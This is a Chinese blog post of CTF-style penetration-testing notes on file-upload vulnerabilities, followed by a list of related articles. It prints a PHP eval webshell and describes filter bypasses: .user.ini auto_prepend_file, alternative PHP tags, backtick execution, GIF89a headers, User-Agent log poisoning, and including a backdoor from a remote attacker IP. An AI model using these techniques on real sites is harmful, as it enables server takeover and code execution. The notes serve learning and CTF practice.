渗透测试学习笔记——文件上传篇

最新推荐文章于 2024-07-22 14:10:07 发布
最新推荐文章于 2024-07-22 14:10:07 发布
阅读量877 收藏 23
点赞数 22
文章标签: 学习 笔记 安全 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sharp6666/article/details/135119835
版权

文件上传

基础知识

  • 文件上传是通过一些上传漏洞上传一些后台文件到服务器上,进而达到控制服务器等目的,上传的文件必须是php文件才能够被执行,后门代码需要以特定格式后缀解析(如php、Java、asp等),不能以图片后缀解析后门代码(如果是图片后缀,执行方式会不一样,没有办法执行代码),如jpg图片中有php后门代码,但是被以jpg方式解析了,因此后门不能被触发,连接不上后门,(解析漏洞除外)
  • 文件上传检测分为前端检测和后端检测两种
  • 通常情况的ctf题用一句话木马就行,一句话木马<?php @eval($_POST['pass']);?>($_POST[‘pass’])中的是密码(这里是pass),用菜刀、蚁剑等连接即可,连接时url写有后门的php的路径
  • 一句话木马也可以用post请求直接连接,post的payload中写pass(前面设置的密码是啥就写啥)=system(要执行的系统命令),就拿到了shell,就可以用pass=system(‘tac path_to_flag’)看flag了,实际上pass=后面写什么,就执行什么php代码,因此不仅可以写system(),也可以写其他的php语句、函数如pass=phpinfo()

技巧手法

  • 纯前端验证(前端js代码验证)由于前端js代码是在浏览器中执行的,因此f12可以直接改前端代码,直接可以绕过纯前端验证,在实际环境中发现有的前端的js是改不了的,这种情况下有两种方法:
    • 1.直接在浏览器中禁用js
    • 2.先发一个能过前端检测的如1.jpg,再用bp将他的名字改成1.php
  • 后端对标签检测——MIME:mime是一种标准的、用来表示文档、文件、字节流等数据的格式和性质的一种流媒体类型,通用结构为type/subtype,由类型与子类型两个字符串中间用/分隔而组成。不允许空格存在。type表示可以被分多个子类的独立类别。subtype表示细分后的每个类型。MIME类型对大小写不敏感,但是传统写法都是小写
    • 在post请求中,有一个字段Content-Type是由前端自动生成的,标识了post请求的内容的MIME标识,后端可能会通过这个MIME标识进行格式检验
    • bp直接改post请求就行
  • 另外一些后端对于文件后缀名的检验可以尝试.php后缀大小写.Php,也可以尝试将后缀改为.php5 .php7,但是能不能正常解析运行这段代码取决于操作系统和中间件
  • .user.ini:
    • php有很多ini文件,每次运行PHP文件时,都会去读取ini文件,来设置PHP的相关规则,.user.ini是一个能被动态加载的ini文件。也就是说我修改了.user.ini后,不需要重启服务器中间件,只需要等待user_ini.cache_ttl所设置的时间(默认为300秒),即可被重新加载
    • .user.ini实际上就是一个可以由用户“自定义”的php.ini
    • 其中有两个配置,可以用来制造后门:auto_append_file和auto_prepend_file,指定一个文件,自动包含在要执行的文件前,类似于在文件前调用了require()函数,逻辑上相当于将指定的文件中的所有内容整个写入当前文件中
    • 例如auto_prepend_file=test.jpgauto_append_file=test.jpg,相当于设置了在php文件执行前/后加载test.jpg文件,在加载时,jpg文件是作为文本加载的,因此只要在jpg文件中写上后门代码,后门代码就相当于被包含到了同一个文件夹下的每一个php文件中,这时候访问网站和.user.ini同一个目录下的index.php(一般是访问index.php,因为一般index.php会调用.user.ini的设置)
    • .user.ini的作用范围仅限于用一个目录及其子目录下,注意范围
    • 可以先上传一个.user.ini,并在里面写上auto_prepend_file=test.jpg,再上传一个test,jpg,就可以执行后门(这时候.user.ini生效范围内的任意php文件都是有后门的)
    • 需要注意的是有一些网站可能压根就没有.user.ini,也没有使用.user.ini,这时候此方法就无效了
  • 后端对内容检测
    • 过滤字符串’php’
      • 标准的php代码格式<?php echo '123'; ?>
      • 变种1<? echo '123'; ?>需要配置short_open_tags=on
      • 变种2<?=表达式?>不需要配置
      • 变种3<% echo '123'; %>需要配置asp_tags=on
      • 变种4<script language="php">echo '123'; </script>不需要配置
    • 过滤[]
      • 可以用{}替换
    • 过滤;
      • 使用上面过滤php中提到的变种2<?=(表达式)?>就可以
    • 过滤()
      • 过滤()很难办,很多后门啥的基本没戏,好在php中用反引号`包裹的内容会直接被视作类似system()函数的功能,直接执行系统命令,例如命令<?=`tac ../flag.php`?>在被执行时会直接调用系统的tac命令,因此()被过滤时可以通过反引号执行下面说的 tac …/flag.php以此绕过()打印flag
    • 因为过滤等问题实在传不上去木马,也可以考虑直接通过user.init.导致的代码执行直接去读一些数据
    • php中system(‘command’)可以直接执行command的指令(系统命令),并且将结果回显到屏幕上,可以配合linux中的tac命令,用于按行反向显示文件内容。它会按照文件的相反顺序显示内容,system('tac ../flag.php')可以显示flag的内容,如果php甚至flag被过滤则可以使用fl*自动补全功能,只有一个匹配项的话可以自动补全
  • 受限于文件内容过滤,可能连反引号`都过滤了,那么连直接打印flag都做不到,就考虑通过一些邪门的上传方法,不通过预期的上传点位上传,而通过其他位置上传
      1. user-agent
      • 在apache,nginx等中间件中都有一个日志文档,如nginx中/var/log/nginx/下面有error.log和access_log,用户访问时的user-agent会被记录到access_log中,因此可以将一句话木马或者其他后门通过user-agent写入access_log中(user-agent的过滤检测一般没有那么严格)
      • 将后门或者显示flag的命令写入access_log后,access_log文件本身是没有执行权限的,因此还需要用.user.ini将一个1.jpg包含到php文件中(一般不能直接用.user.ini将access.log直接包含到php中,而是需要一个图片文件作为桥梁),1.jpg的内容为<?=include"/var/log/nginx/access.log"?>,当然在很多情况下为了应对过滤,可以使用<?=include"/var/lo"."g/nginx/access.lo"."g"?>在php中"ab"."c"代表字符串拼接
      • 这样打开.user.ini目录下的index.php后,access.log的内容就已经在index.php中了,这些语句就有了执行权限,当然也包括后门或者输出flag的语句,就可以用蚁剑连接index.php啦
      1. 远程路径
      • 在上传的图片文件内容中,有时候过滤极其严格,例如连.都不能出现,.user.ini就没法写auto_append_file=test.jpg,可以将test.jpg直接写成xxx,不带后缀,也是一样的
      • 还有一种情况是过滤很严格,很难搞,可以在.user.ini中写auto_append_file=http://ip地址这样可以把该ip地址对应的网页的php文件包含到当前网页中来,也就是说可以自己弄个网站,主页写上后门,用来被访问。注意ip地址和int是可以互相转换的,在访问时效果一样,这里由于可能过滤了.,可以将ip地址转化为int写入,这样就可以绕过.过滤
      • 还可以先在.user.ini中写auto_append_file=xxx,再在xxx中写<?=include'http://ip地址'?>通过xxx作呕为桥梁将php文件包含进来
  • 后端对文件头过滤
    • 每个文件的头部会有一些字节用特定的编码来标识文件的格式,一些后端的代码会通过读取文件头部来判断上传的文件是否为图片,(有时候可能还会判断文件头和后缀是否一致)最好写的是git的文件头GIF89a,文件头和代码用空格或换行隔开
    • 有文件头过滤的时候,需要在要传的文件基础上加文件头,来确保上传成功
    • 然而由于文件头的存在,肯定是不可能直接传一个.php的,因此也需要用到.user.init来将上传的文件包含到其他php文件中执行

做题过程

    1. 改前端代码或用bp绕过前端过滤
    1. 判断能不能直接传php
    • 抓包改MINE
    • 改php文件后缀,大小写,php5,php7等
    • 不能传php则进行下一步
    1. 不能传php,只能传图片,则将php文件后缀改为图片格式:
    • 判断一下有没有文件头检查,有的话加文件头
    • 尝试一下.user.ini,让图片可以被执行(除非能直接传一个php上去,否则只要需要传的是图片,图片本身无法执行,都需要.user.ini将图片内的代码包含到可执行的php代码中去执行),注意.user.ini也有可能有内容或者文件头的过滤
    • 传图片也可能有后端内容检查,尝试各种过滤绕过
    • 后门代码绕过不了,考虑不植入后门,而是直接用system()或``进行系统命令调用
    1. 发现上传的文件的内容检查太严,连``都过滤了,什么都写不了,实在没办法了,尝试一下别的上传方法
    • user-agent,将后门写到user-agent中,代码会写入access.log,将用.user.ini和1.jpg两个桥梁将log中的可执行命令写到可执行php中
    • 远程地址,.user.ini将远程网页上的有后门的php包含到网页中来
sharp6666
关注
  • 22
    点赞
  • 23
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
渗透测试入门——渗透测试笔记
01-27
CMS同样能在网上找到许多漏洞,常用作渗透测试的练习靶机。根据提示,第1题要求找到咨询平台的管理员账号密码;第2题需要登录服务器后台,并插入木马,再用中国菜刀连接,继而找到在管理员桌面上的 flag文件;第3题...
渗透测试——六、网站漏洞——文件上传
钟言的博客
12-06 9391
学习渗透测试的第六课,网络漏洞之文件上传漏洞,详细内容包含了:文件包含 PHP伪协议、文件上传四、文件包含页面之包含测试五、文件上传页面之上传测试等等,
渗透测试CISP-PTE:文件上传
未知2066的博客
02-29 1044
文件上传漏洞是一种常见的安全漏洞,指的是攻击者可以通过上传恶意文件来执行任意代码或获取系统权限。这种漏洞通常出现在Web应用程序中,攻击者利用漏洞可以上传包含恶意代码的文件,然后通过访问该文件来执行攻击。
渗透测试文件上传
weixin_52177486的博客
02-16 669
用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力(上传web脚本能够被服务器解析)通常存在于网页主界面(个人资料,提交文档)、后台登录系统以及许多未关闭的接口。在实战环境中,我们不能看到服务器上的计算器是否正常开启,所以使用可以看到回显的命令,从而确保正常执行,在当前目录下写一个2.txt文件,里面存入内容123123123.4、寻找脚本上传之后的路径,看是否可以访问到(如果看到空白的页面说明脚本被解析了、如果没有解析脚本会以文本的方式出现在网页上)。
渗透测试[文件上传]
npc88888的博客
03-03 1215
在不同的中间件中有特殊的情况,如果在 apache 可以开启 application/x-httpd-php 在 AddType application/x-httpd-php .php .phtml .php3 后缀名为 phtml 、php3 均被解析成 php 有的 apache 版本默认就会开启。把恶意文件改成 js 允许上传的文件后缀,如 jpg、gif、png 等,再通过抓包 工具抓取 post 的数据包,把后缀名改成可执行的脚本后缀如 php 、asp、jsp、 net 等。
web渗透测试--文件上传漏洞
qq_27339511的博客
06-20 299
但是默认情况下 .phtml .php3 .php4 .php5这些都有可能会被当作.php执行。规定用户不允许上传.php、.php5、.phtml、.asp、.aspx、.jsp等后缀文件。对用户上传文件的后缀没有进行严格的限制,导致可以上传webshell后门。方法三:由于是前端验证,我们可以修改前端代码,使我们上传的文件通过校验。方法二:通过burpsuit抓包,修改后缀为.php。上传文件为pass01.jpg,通过抓包修改后缀。规定用户允许上传.jpg、.png等后缀文件。
渗透测试-任意文件上传及客户端绕过案例
lza20001103的博客
04-25 903
任意文件上传及客户端绕过案例
web渗透-------WEB漏洞(文件上传
hhhjjjllll的博客
05-12 1101
文件上传漏洞是指 Web 服务器允许用户将文件上传至其文件系统,但这些文件可能并没有经过充分的验证,如文件名称、类型、内容或大小等。未能正确执行这些限制就意味着即使最基本的图像上传功能也可能用于上传任意具有潜在危险的文件,里面甚至包括远程代码执行的服务器端脚本文件。在某些情况下,上传文件的行为本身就足以造成损害,其他攻击对该文件后续 HTTP 的请求,通常是为了触发服务器执行该文件。
Python学习笔记——用户登录测试
12-22
在本《Python学习笔记——用户登录测试》中,我们将探讨如何使用Python语言实现一个简单的用户登录系统。这个系统能够接收用户的账号和密码输入,并进行有效性验证。通过这个实例,初学者可以了解到基础的Python...
渗透测试学习笔记资源
08-19
渗透测试学习笔记资源
渗透测试学习笔记之案例二.pdf
04-06
渗透测试学习笔记
web渗透之文件上传漏洞
qinshuoyang1的博客
07-19 3914
文件上传漏洞可以说是日常渗透测试中用得最多的一个漏洞,用它获得服务器权限最快最直接。在Web程序中,经常需要用到文件上传的功能。如用户或者管理员上传图片,或者其它文件。如果没有限制上传类型或者限制不严格被绕过,就有可能造成文件上传漏洞。如果上传了可执行文件或者网页脚本,就会导致网站被控制甚至服务器沦陷。,复杂一点的情况是配合 Web Server的解析漏洞来获取控制权或结合文件包含漏洞。......
编程学习之路:从零到一的成长指南
最新发布
KsuferNotes
07-22 412
在当今数字化时代,编程技能已经成为许多人职业发展的重要组成部分。不论你是已经在IT业从业多年的老手,还是刚刚起步的编程新手,这博客将带你走过编程学习的每一个重要阶段,从而顺利完成从零到一的华丽转变。
kubernetes学习日志(七)
qq_47037022的博客
07-18 635
本文记录了service管理,ingress管理,Dashboard管理插件,集群鉴权策略,角色与全局角色,赋权与全局角色赋权。
手写简易版Spring IOC容器02【学习
weixin_44794897的博客
07-19 591
其中applyPropertyValues用于从beanDefinition中读取属性的配置信息然后通过BeanUtil(hutool-all中提供的类)为其赋值@Overridetry {// 创建bean实例Class<?if (null!break;// 设置属性值try {// 从beanDefinition中获取property通过Resource获取文件流。
昇思25天学习打卡营第16天|munger85
MungerVC
07-20 449
MobileNet网络是由Google团队于2017年提出的专注于移动端、嵌入式或IoT设备的轻量级CNN网络,相比于传统的卷积神经网络首先安装依赖下载数据。
MISRA C2012学习笔记(7)-Rules 8.12
赞的博客
07-20 702
为便于理解以下示例,应注意,1u 的基本类型是 unsigned char,而 1UL 的基本类型是 unsigned long。在下面这个示例中,表达式 DELAY + WIDTH 的值为 70000,但是在具有 16 位 int 类型的计算机上,该。所有这些都是合规的,但取决于 a,b 和 c 的类型,具有多个运算符的任何表达式都可能违反其他规则。,可以消除程序员的期望与事实不符的可能性。下面的示例显示具有单目或后缀运算符的表达式,其操作数是主表达式或顶级运算符具有优先级 15 的表达式。
从0开始的STM32HAL库学习6
hwq_1229_0525的博客
07-21 333
配置红色框图中的各种配置时钟源选择外部时钟 21.预分频器Prescaler,下面填0,不分频2.计数模式,计数模式选择为向上计数3.自动重装寄存器,自动重装计数器填为10,计数到10后清空并出发中断4.滤波器的频率分频:不使用影子寄存器。
java 上传文件_JAVA学习笔记——fileUpload文件上传
05-17
文件上传Web开发中常见的功能之一,Java中也提供了多种方式来实现文件上传。其中,一种常用的方式是通过Apache的commons-fileupload组件来实现文件上传。 以下是实现文件上传的步骤: 1.在pom.xml文件中添加以下依赖: ```xml <dependency> <groupId>commons-fileupload</groupId> <artifactId>commons-fileupload</artifactId> <version>1.3.3</version> </dependency> ``` 2.在前端页面中添加文件上传表单: ```html <form method="post" enctype="multipart/form-data" action="upload"> <input type="file" name="file"> <input type="submit" value="Upload"> </form> ``` 3.在后台Java代码中处理上传文件: ```java // 创建一个DiskFileItemFactory对象,用于解析上传的文件 DiskFileItemFactory factory = new DiskFileItemFactory(); // 设置缓冲区大小,如果上传的文件大于缓冲区大小,则先将文件保存到临时文件中,再进行处理 factory.setSizeThreshold(1024 * 1024); // 创建一个ServletFileUpload对象,用于解析上传的文件 ServletFileUpload upload = new ServletFileUpload(factory); // 设置上传文件的大小限制,这里设置为10MB upload.setFileSizeMax(10 * 1024 * 1024); // 解析上传的文件,得到一个FileItem的List集合 List<FileItem> items = upload.parseRequest(request); // 遍历FileItem的List集合,处理上传的文件 for (FileItem item : items) { // 判断当前FileItem是否为上传的文件 if (!item.isFormField()) { // 获取上传文件的文件名 String fileName = item.getName(); // 创建一个File对象,用于保存上传的文件 File file = new File("D:/uploads/" + fileName); // 将上传的文件保存到指定的目录中 item.write(file); } } ``` 以上代码中,首先创建了一个DiskFileItemFactory对象,用于解析上传的文件。然后设置了缓冲区大小和上传文件的大小限制。接着创建一个ServletFileUpload对象,用于解析上传的文件。最后遍历FileItem的List集合,判断当前FileItem是否为上传的文件,如果是,则获取文件名,创建一个File对象,将上传的文件保存到指定的目录中。 4.文件上传完成后,可以给用户一个提示信息,例如: ```java response.getWriter().write("File uploaded successfully!"); ``` 以上就是使用Apache的commons-fileupload组件实现文件上传的步骤。需要注意的是,文件上传可能会带来安全隐患,因此在处理上传的文件时,需要进行严格的校验和过滤。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值